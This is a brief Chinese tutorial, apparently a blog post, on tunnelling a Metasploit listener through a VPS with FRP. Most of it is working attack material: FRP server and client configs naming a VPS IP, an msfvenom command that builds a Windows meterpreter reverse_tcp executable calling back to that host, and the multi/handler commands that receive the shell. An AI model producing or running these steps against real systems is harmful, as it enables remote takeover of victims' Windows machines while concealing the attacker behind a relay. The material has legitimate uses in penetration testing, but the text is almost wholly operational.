服务端:VPS
![](https://img-blog.csdnimg.cn/img_convert/56b037b3ea1c7bfc5f367d9b57e05b3d.png)
frps.ini
[common]
bind_port = 7000
![](https://img-blog.csdnimg.cn/img_convert/366ac09ac272ad04faf6ab7036baaca2.png)
chmod +x frps
客户端:Kali
[common]
server_addr = 101.43.236.45 #VPS的IP
server_port = 7000
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 8081
remote_port = 10126
chmod +x frpc
VPS的10126端口的流量转发到客户端的8081上
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.43.236.45 lport=10126 -f exe -o /tmp/m.exe
./frpc -c ./frpc.ini
./frps -c ./frps.ini
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8081
![](https://img-blog.csdnimg.cn/img_convert/c78710a2355761801ac61b8aa8164548.png)
![](https://img-blog.csdnimg.cn/img_convert/03c41140e53284aa2f6ef9d6c53405f4.png)